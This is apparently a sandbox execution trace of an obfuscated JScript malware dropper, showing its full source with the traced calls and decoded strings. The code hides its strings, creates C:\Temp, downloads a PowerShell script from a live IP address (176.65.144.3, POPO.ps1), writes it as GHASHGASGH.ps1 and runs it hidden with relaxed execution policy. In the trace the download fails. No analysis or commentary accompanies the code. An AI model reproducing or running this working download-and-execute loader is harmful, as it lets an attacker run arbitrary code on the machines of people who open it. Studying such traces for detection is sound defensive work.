    • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
    • Show all Function Runs
    1
    var m = [ 'message', '523362EaabQf', '680259YMcTyC', 'Exiting\x20script\x20due\x20to\x20download\x20failure.', 'Scripting.FileSystemObject', 'CreateObject', 'Run', 'Echo', '19478fjLYJG', 'Status', '10Zjgbgr', '985635JFbYNr', 'MSXML2.XMLHTTP', 'PowerShell\x20-NoProfile\x20-ExecutionPolicy\x20RemoteSigned\x20-File\x20', 'WScript.Shell', 'Quit', '248574XzFYqA', 'FolderExists', 'C:\x5cTemp', 'C:\x5cTemp\x5cGHASHGASGH.ps1', 'Error\x20downloading\x20script:\x20', 'CreateTextFile', '1163034mzXDwI', 'Open', '8HZZbLq', '4EHIIOS', 'Send', 'CreateFolder', 'ResponseText', '806504CPQRAT' ];
      2
      a =
        3
        function () {
        • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
        • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
        • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
        • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
        • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
        • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
        • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
        • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
        • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
        • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
        • Show all Function Runs
        4
        return m;
          5
          };
            6
            return a ( );
            • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
            • Show all Function Runs
            7
            }
              8
              var i = b;
                9
                ( function (c, d) {
                • (function a(),148416) ➔ undefined
                • (function a(),148416) ➔ undefined
                • Show all Function Runs
                10
                var h = b, e = c ( );
                • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
                • Show all Function Runs
                11
                while (! ! [ ] )
                  12
                  {
                    13
                    try
                      14
                      {
                        15
                        var f = - parseInt ( h ( 0x1ed ) ) / 0x1 * ( parseInt ( h ( 0x1fb ) ) / 0x2 ) + parseInt ( h ( 0x1f5 ) ) / 0x3 * ( parseInt ( h ( 0x1ee ) ) / 0x4 ) + - parseInt ( h ( 0x1e0 ) ) / 0x5 + parseInt ( h ( 0x1e5 ) ) / 0x6 + - parseInt ( h ( 0x1f4 ) ) / 0x7 + parseInt ( h ( 0x1f2 ) ) / 0x8 + - parseInt ( h ( 0x1eb ) ) / 0x9 * ( - parseInt ( h ( 0x1df ) ) / 0xa );
                        • b(493) ➔ "Quit"
                        • parseInt("Quit") ➔ NaN
                        • b(507) ➔ "806504CPQRAT"
                        • parseInt("806504CPQRAT") ➔ 806504
                        • b(501) ➔ "Open"
                        • parseInt("Open") ➔ NaN
                        • b(494) ➔ "248574XzFYqA"
                        • parseInt("248574XzFYqA") ➔ 248574
                        • b(480) ➔ "680259YMcTyC"
                        • parseInt("680259YMcTyC") ➔ 680259
                        • b(485) ➔ "Echo"
                        • parseInt("Echo") ➔ NaN
                        • b(500) ➔ "1163034mzXDwI"
                        • parseInt("1163034mzXDwI") ➔ 1163034
                        • b(498) ➔ "Error downloading script: "
                        • parseInt("Error downloading script: ") ➔ NaN
                        • b(491) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                        • parseInt("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ") ➔ NaN
                        • b(479) ➔ "523362EaabQf"
                        • parseInt("523362EaabQf") ➔ 523362
                        • h(493) ➔ "248574XzFYqA"
                        • parseInt("248574XzFYqA") ➔ 248574
                        • h(507) ➔ "message"
                        • parseInt("message") ➔ NaN
                        • h(501) ➔ "8HZZbLq"
                        • parseInt("8HZZbLq") ➔ 8
                        • h(494) ➔ "FolderExists"
                        • parseInt("FolderExists") ➔ NaN
                        • h(480) ➔ "Exiting script due to download failure."
                        • parseInt("Exiting script due to download failure.") ➔ NaN
                        • h(485) ➔ "19478fjLYJG"
                        • parseInt("19478fjLYJG") ➔ 19478
                        • h(500) ➔ "Open"
                        • parseInt("Open") ➔ NaN
                        • h(498) ➔ "CreateTextFile"
                        • parseInt("CreateTextFile") ➔ NaN
                        • h(491) ➔ "WScript.Shell"
                        • parseInt("WScript.Shell") ➔ NaN
                        • h(479) ➔ "680259YMcTyC"
                        • parseInt("680259YMcTyC") ➔ 680259
                        • h(493) ➔ "FolderExists"
                        • parseInt("FolderExists") ➔ NaN
                        • h(507) ➔ "523362EaabQf"
                        • parseInt("523362EaabQf") ➔ 523362
                        • h(501) ➔ "4EHIIOS"
                        • parseInt("4EHIIOS") ➔ 4
                        • h(494) ➔ "C:\Temp"
                        • parseInt("C:\Temp") ➔ NaN
                        • h(480) ➔ "Scripting.FileSystemObject"
                        • parseInt("Scripting.FileSystemObject") ➔ NaN
                        • h(485) ➔ "Status"
                        • parseInt("Status") ➔ NaN
                        • h(500) ➔ "8HZZbLq"
                        • parseInt("8HZZbLq") ➔ 8
                        • h(498) ➔ "1163034mzXDwI"
                        • parseInt("1163034mzXDwI") ➔ 1163034
                        • h(491) ➔ "Quit"
                        • parseInt("Quit") ➔ NaN
                        • h(479) ➔ "Exiting script due to download failure."
                        • parseInt("Exiting script due to download failure.") ➔ NaN
                        • h(493) ➔ "C:\Temp"
                        • parseInt("C:\Temp") ➔ NaN
                        • h(507) ➔ "680259YMcTyC"
                        • parseInt("680259YMcTyC") ➔ 680259
                        • h(501) ➔ "Send"
                        • parseInt("Send") ➔ NaN
                        • h(494) ➔ "C:\Temp\GHASHGASGH.ps1"
                        • parseInt("C:\Temp\GHASHGASGH.ps1") ➔ NaN
                        • h(480) ➔ "CreateObject"
                        • parseInt("CreateObject") ➔ NaN
                        • h(485) ➔ "10Zjgbgr"
                        • parseInt("10Zjgbgr") ➔ 10
                        • h(500) ➔ "4EHIIOS"
                        • parseInt("4EHIIOS") ➔ 4
                        • h(498) ➔ "Open"
                        • parseInt("Open") ➔ NaN
                        • h(491) ➔ "248574XzFYqA"
                        • parseInt("248574XzFYqA") ➔ 248574
                        • h(479) ➔ "Scripting.FileSystemObject"
                        • parseInt("Scripting.FileSystemObject") ➔ NaN
                        • h(493) ➔ "C:\Temp\GHASHGASGH.ps1"
                        • parseInt("C:\Temp\GHASHGASGH.ps1") ➔ NaN
                        • h(507) ➔ "Exiting script due to download failure."
                        • parseInt("Exiting script due to download failure.") ➔ NaN
                        • h(501) ➔ "CreateFolder"
                        • parseInt("CreateFolder") ➔ NaN
                        • h(494) ➔ "Error downloading script: "
                        • parseInt("Error downloading script: ") ➔ NaN
                        • h(480) ➔ "Run"
                        • parseInt("Run") ➔ NaN
                        • h(485) ➔ "985635JFbYNr"
                        • parseInt("985635JFbYNr") ➔ 985635
                        • h(500) ➔ "Send"
                        • parseInt("Send") ➔ NaN
                        • h(498) ➔ "8HZZbLq"
                        • parseInt("8HZZbLq") ➔ 8
                        • h(491) ➔ "FolderExists"
                        • parseInt("FolderExists") ➔ NaN
                        • h(479) ➔ "CreateObject"
                        • parseInt("CreateObject") ➔ NaN
                        • h(493) ➔ "Error downloading script: "
                        • parseInt("Error downloading script: ") ➔ NaN
                        • h(507) ➔ "Scripting.FileSystemObject"
                        • parseInt("Scripting.FileSystemObject") ➔ NaN
                        • h(501) ➔ "ResponseText"
                        • parseInt("ResponseText") ➔ NaN
                        • h(494) ➔ "CreateTextFile"
                        • parseInt("CreateTextFile") ➔ NaN
                        • h(480) ➔ "Echo"
                        • parseInt("Echo") ➔ NaN
                        • h(485) ➔ "MSXML2.XMLHTTP"
                        • parseInt("MSXML2.XMLHTTP") ➔ NaN
                        • h(500) ➔ "CreateFolder"
                        • parseInt("CreateFolder") ➔ NaN
                        • h(498) ➔ "4EHIIOS"
                        • parseInt("4EHIIOS") ➔ 4
                        • h(491) ➔ "C:\Temp"
                        • parseInt("C:\Temp") ➔ NaN
                        • h(479) ➔ "Run"
                        • parseInt("Run") ➔ NaN
                        • h(493) ➔ "CreateTextFile"
                        • parseInt("CreateTextFile") ➔ NaN
                        • h(507) ➔ "CreateObject"
                        • parseInt("CreateObject") ➔ NaN
                        • h(501) ➔ "806504CPQRAT"
                        • parseInt("806504CPQRAT") ➔ 806504
                        • h(494) ➔ "1163034mzXDwI"
                        • parseInt("1163034mzXDwI") ➔ 1163034
                        • h(480) ➔ "19478fjLYJG"
                        • parseInt("19478fjLYJG") ➔ 19478
                        • h(485) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                        • parseInt("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ") ➔ NaN
                        • h(500) ➔ "ResponseText"
                        • parseInt("ResponseText") ➔ NaN
                        • h(498) ➔ "Send"
                        • parseInt("Send") ➔ NaN
                        • h(491) ➔ "C:\Temp\GHASHGASGH.ps1"
                        • parseInt("C:\Temp\GHASHGASGH.ps1") ➔ NaN
                        • h(479) ➔ "Echo"
                        • parseInt("Echo") ➔ NaN
                        • h(493) ➔ "1163034mzXDwI"
                        • parseInt("1163034mzXDwI") ➔ 1163034
                        • h(507) ➔ "Run"
                        • parseInt("Run") ➔ NaN
                        • h(501) ➔ "message"
                        • parseInt("message") ➔ NaN
                        • h(494) ➔ "Open"
                        • parseInt("Open") ➔ NaN
                        • h(480) ➔ "Status"
                        • parseInt("Status") ➔ NaN
                        • h(485) ➔ "WScript.Shell"
                        • parseInt("WScript.Shell") ➔ NaN
                        • h(500) ➔ "806504CPQRAT"
                        • parseInt("806504CPQRAT") ➔ 806504
                        • h(498) ➔ "CreateFolder"
                        • parseInt("CreateFolder") ➔ NaN
                        • h(491) ➔ "Error downloading script: "
                        • parseInt("Error downloading script: ") ➔ NaN
                        • h(479) ➔ "19478fjLYJG"
                        • parseInt("19478fjLYJG") ➔ 19478
                        • h(493) ➔ "Open"
                        • parseInt("Open") ➔ NaN
                        • h(507) ➔ "Echo"
                        • parseInt("Echo") ➔ NaN
                        • h(501) ➔ "523362EaabQf"
                        • parseInt("523362EaabQf") ➔ 523362
                        • h(494) ➔ "8HZZbLq"
                        • parseInt("8HZZbLq") ➔ 8
                        • h(480) ➔ "10Zjgbgr"
                        • parseInt("10Zjgbgr") ➔ 10
                        • h(485) ➔ "Quit"
                        • parseInt("Quit") ➔ NaN
                        • h(500) ➔ "message"
                        • parseInt("message") ➔ NaN
                        • h(498) ➔ "ResponseText"
                        • parseInt("ResponseText") ➔ NaN
                        • h(491) ➔ "CreateTextFile"
                        • parseInt("CreateTextFile") ➔ NaN
                        • h(479) ➔ "Status"
                        • parseInt("Status") ➔ NaN
                        • h(493) ➔ "8HZZbLq"
                        • parseInt("8HZZbLq") ➔ 8
                        • h(507) ➔ "19478fjLYJG"
                        • parseInt("19478fjLYJG") ➔ 19478
                        • h(501) ➔ "680259YMcTyC"
                        • parseInt("680259YMcTyC") ➔ 680259
                        • h(494) ➔ "4EHIIOS"
                        • parseInt("4EHIIOS") ➔ 4
                        • h(480) ➔ "985635JFbYNr"
                        • parseInt("985635JFbYNr") ➔ 985635
                        • h(485) ➔ "248574XzFYqA"
                        • parseInt("248574XzFYqA") ➔ 248574
                        • h(500) ➔ "523362EaabQf"
                        • parseInt("523362EaabQf") ➔ 523362
                        • h(498) ➔ "806504CPQRAT"
                        • parseInt("806504CPQRAT") ➔ 806504
                        • h(491) ➔ "1163034mzXDwI"
                        • parseInt("1163034mzXDwI") ➔ 1163034
                        • h(479) ➔ "10Zjgbgr"
                        • parseInt("10Zjgbgr") ➔ 10
                        • Show all Function Runs
                        16
                        if ( f === d )
                          17
                          break ;
                            18
                            else
                              19
                              e['push'] ( e['shift'] ( ) );
                                20
                                }
                                  21
                                  catch ( g )
                                    22
                                    {
                                      23
                                      e['push'] ( e['shift'] ( ) );
                                        24
                                        }
                                          25
                                          }
                                            26
                                            } ( a, 0x243c0 ) );
                                              27
                                              function b(c, d) {
                                              • b(493) ➔ "Quit"
                                              • b(507) ➔ "806504CPQRAT"
                                              • b(501) ➔ "Open"
                                              • b(494) ➔ "248574XzFYqA"
                                              • b(480) ➔ "680259YMcTyC"
                                              • b(485) ➔ "Echo"
                                              • b(500) ➔ "1163034mzXDwI"
                                              • b(498) ➔ "Error downloading script: "
                                              • b(491) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                              • b(479) ➔ "523362EaabQf"
                                              • Show all Function Runs
                                              28
                                              var e = a ( );
                                              • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
                                              • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
                                              • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
                                              • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
                                              • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
                                              • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
                                              • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
                                              • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
                                              • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
                                              • a() ➔ message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject,CreateObject,Run,Echo,19478fjLYJG,Status,10Zjgbgr,985635JFbYNr,MSXML2.XMLHTTP,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,WScript.Shell,Quit,248574XzFYqA,FolderExists,C:\Temp,C:\Temp\GHASHGASGH.ps1,Error downloading script: ,CreateTextFile,1163034mzXDwI,Open,8HZZbLq,4EHIIOS,Send,CreateFolder,ResponseText,806504CPQRAT
                                              • Show all Function Runs
                                              29
                                              return b =
                                                30
                                                function (f, g) {
                                                • b(493,undefined) ➔ "Quit"
                                                • b(507,undefined) ➔ "806504CPQRAT"
                                                • b(501,undefined) ➔ "Open"
                                                • b(494,undefined) ➔ "248574XzFYqA"
                                                • b(480,undefined) ➔ "680259YMcTyC"
                                                • b(485,undefined) ➔ "Echo"
                                                • b(500,undefined) ➔ "1163034mzXDwI"
                                                • b(498,undefined) ➔ "Error downloading script: "
                                                • b(491,undefined) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                • b(479,undefined) ➔ "523362EaabQf"
                                                • Show all Function Runs
                                                31
                                                f = f - 0x1de;
                                                  32
                                                  var h = e[f];
                                                    33
                                                    return h;
                                                      34
                                                      }, b ( c, d );
                                                        35
                                                        }
                                                          36
                                                          var URL = 'http://176.65.144.3/host/POPO.ps1', DownloadPath = i ( 0x1e8 ), TEMP_DIR = i ( 0x1e7 ), SUCCESS_STATUS = 0xc8, POWERSHELL_CMD = i ( 0x1e2 ), shell = WScript[i ( 0x1f8 ) ] ( i ( 0x1e3 ) ), fileSystem = WScript[i ( 0x1f8 ) ] ( i ( 0x1f7 ) ), http = WScript[i ( 0x1f8 ) ] ( i ( 0x1e1 ) );
                                                          • i(488) ➔ "C:\Temp\GHASHGASGH.ps1"
                                                          • i(487) ➔ "C:\Temp"
                                                          • i(482) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                          • i(504) ➔ "CreateObject"
                                                          • i(483) ➔ "WScript.Shell"
                                                          • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                          • i(504) ➔ "CreateObject"
                                                          • i(503) ➔ "Scripting.FileSystemObject"
                                                          • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                          • i(504) ➔ "CreateObject"
                                                          • i(481) ➔ "MSXML2.XMLHTTP"
                                                          • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                          • Show all Function Runs
                                                          37
                                                          ! fileSystem[i ( 0x1e6 ) ] ( TEMP_DIR ) && fileSystem[i ( 0x1f0 ) ] ( TEMP_DIR );
                                                          • i(486) ➔ "FolderExists"
                                                          • FolderExists("C:\Temp") ➔ false
                                                          • i(496) ➔ "CreateFolder"
                                                          • CreateFolder("C:\Temp") ➔ C:\Temp
                                                          • Show all Function Runs
                                                          38
                                                          function DownloadScript(c, d) {
                                                          • DownloadScript("http://176.65.144.3/host/POPO.ps1","C:\Temp\GHASHGASGH.ps1") ➔ false
                                                          39
                                                          var j = i;
                                                            40
                                                            try
                                                              41
                                                              {
                                                                42
                                                                http[j ( 0x1ec ) ] ( 'GET', c, ! [] ), http[j ( 0x1ef ) ] ( );
                                                                • j(492) ➔ "Open"
                                                                • Open("GET","http://176.65.144.3/host/POPO.ps1",false) ➔ undefined
                                                                • j(495) ➔ "Send"
                                                                • Send() ➔ undefined
                                                                • Show all Function Runs
                                                                43
                                                                if ( http[j ( 0x1de ) ] === SUCCESS_STATUS )
                                                                  44
                                                                  {
                                                                    45
                                                                    var f = fileSystem[j ( 0x1ea ) ] ( d, ! ! [] );
                                                                      46
                                                                      return f['Write'] ( http[j ( 0x1f1 ) ] ), f['Close'] ( ), ! ! [];
                                                                        47
                                                                        }
                                                                          48
                                                                          else
                                                                            49
                                                                            return LogError ( 'Download\x20failed\x20with\x20status:\x20' + http[j ( 0x1de ) ] ), ! [];
                                                                              50
                                                                              }
                                                                                51
                                                                                catch ( g )
                                                                                  52
                                                                                  {
                                                                                    53
                                                                                    return LogError ( j ( 0x1e9 ) + g[j ( 0x1f3 ) ] ), ! [];
                                                                                    • j(489) ➔ "Error downloading script: "
                                                                                    • j(499) ➔ "message"
                                                                                    • LogError("Error downloading script: The system cannot locate the resource specified. ") ➔ undefined
                                                                                    • Show all Function Runs
                                                                                    54
                                                                                    }
                                                                                      55
                                                                                      }
                                                                                        56
                                                                                        function LogError(c) {
                                                                                        • LogError("Error downloading script: The system cannot locate the resource specified. ") ➔ undefined
                                                                                        • LogError("Exiting script due to download failure.") ➔ undefined
                                                                                        • Show all Function Runs
                                                                                        57
                                                                                        var k = i;
                                                                                          58
                                                                                          WScript[k ( 0x1fa ) ] ( c );
                                                                                          • k(506) ➔ "Echo"
                                                                                          • Windows Script Host.Echo("Error downloading script: The system cannot locate the resource specified. ") ➔ undefined
                                                                                          • k(506) ➔ "Echo"
                                                                                          • Windows Script Host.Echo("Exiting script due to download failure.") ➔ undefined
                                                                                          • Show all Function Runs
                                                                                          59
                                                                                          }
                                                                                            60
                                                                                            function RunPowerShellScript(c) {
                                                                                              61
                                                                                              var l = i;
                                                                                                62
                                                                                                try
                                                                                                  63
                                                                                                  {
                                                                                                    64
                                                                                                    var d = POWERSHELL_CMD + '\x22' + c + '\x22';
                                                                                                      65
                                                                                                      shell[l ( 0x1f9 ) ] ( d, 0x0, ! ! [] );
                                                                                                        66
                                                                                                        }
                                                                                                          67
                                                                                                          catch ( f )
                                                                                                            68
                                                                                                            {
                                                                                                              69
                                                                                                              LogError ( 'Failed\x20to\x20execute\x20PowerShell\x20script:\x20' + f[l ( 0x1f3 ) ] );
                                                                                                                70
                                                                                                                }
                                                                                                                  71
                                                                                                                  }
                                                                                                                    72
                                                                                                                    DownloadScript ( URL, DownloadPath ) ? RunPowerShellScript ( DownloadPath ) : ( LogError ( i ( 0x1f6 ) ), WScript[i ( 0x1e4 ) ] ( ) );
                                                                                                                    • DownloadScript("http://176.65.144.3/host/POPO.ps1","C:\Temp\GHASHGASGH.ps1") ➔ false
                                                                                                                    • i(502) ➔ "Exiting script due to download failure."
                                                                                                                    • LogError("Exiting script due to download failure.") ➔ undefined
                                                                                                                    • i(484) ➔ "Quit"
                                                                                                                    • Show all Function Runs